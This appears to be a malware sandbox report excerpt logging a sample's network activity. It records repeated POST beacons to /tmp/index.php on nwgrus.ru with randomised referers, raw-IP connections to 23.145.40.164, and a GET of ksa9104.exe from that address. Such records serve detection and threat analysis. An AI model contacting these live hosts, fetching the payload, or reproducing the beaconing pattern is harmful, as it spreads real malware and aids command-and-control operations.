    Source: global trafficHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://hoxyxvpdayru.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 109Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://arlhmhxchhgqep.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tdpshksrvfora.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 333Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhxuuwgfmyhe.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hkuvmvjfakdhd.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gspricnhwajrk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 116Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ihkjhoeohsucndfk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 341Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lpitxyhvwvj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 356Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yltrrjxrgdt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 293Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jypectwcaivky.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 147Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uvanlbvtcqkc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jkgktqvsjdwb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 300Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cxrauupqkavo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 157Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmrccqvtujxqbxpg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 296Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://keeemaaxcllp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 171Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://iwmxjihevykqvbos.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lxadwtocjtceer.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 213Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hvtgqqwlcbupjdi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 194Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cestfyhpiwlpo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qocskrvscrey.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 158Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tcqfwxekwxifmk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 346Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qhndxwhkmipxgbaj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 122Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://awkedsxfgif.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 221Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xnrwcbelwfy.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 120Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hidbwvhnrpsqtckd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kldixuwrvoj.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 322Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jrduoddrbbwoyfog.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fadawnjwyvdbowke.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ejoaxqvdwaljnps.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 166Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qmmqfrtscgkdrbea.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 229Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kcwpxhfqrcwcynne.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ksfanihxkdmgc.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gshbntjmlxbreay.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqkcxjfgdkafebli.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 290Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pvrcqmbcktsc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 236Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gvwiwavaujycn.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 306Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://anqkqcglkprylr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 347Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbnjhrckmixdmp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 230Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwckdfwbqxcvipv.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 328Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qeoeefjxuhhhbrbu.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: nwgrus.ru
    Source: global trafficHTTP traffic detected: POST /tmp/index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xxxghskpkjdphcpk.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 259Host: nwgrus.ru
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: unknownTCP traffic detected without corresponding DNS query: 23.145.40.164
    Source: global trafficHTTP traffic detected: GET /ksa9104.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 23.145.40.164
    Source: global trafficDNS traffic detected: DNS query: nwgrus.ru
    Source: global trafficDNS traffic detected: DNS query: ninjahallnews.com
    Source: global trafficDNS traffic detected: DNS query: globalviewsnature.com
    Source: unknownHTTP traffic detected: POST /search.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: https://emovkvrsbdl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 234Host: ninjahallnews.com
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:19 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:35 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Type: text/html; charset=utf-8Connection: closeTransfer-Encoding: chunked
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:36 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:15:43 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 409Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:16:57 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:17:16 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:17:34 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 08 Oct 2024 01:17:52 GMTServer: Apache/2.4.52 (Ubuntu)X-Frame-Options: DENYX-Content-Type-Options: nosniffX-Frame-Options: DENYX-Content-Type-Options: nosniffContent-Length: 7Content-Type: text/html; charset=utf-8Connection: close
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:21 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 04 00 00 00 72 e8 87 ec Data Ascii: r
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:23 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:24 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:27 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Tue, 08 Oct 2024 01:14:31 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
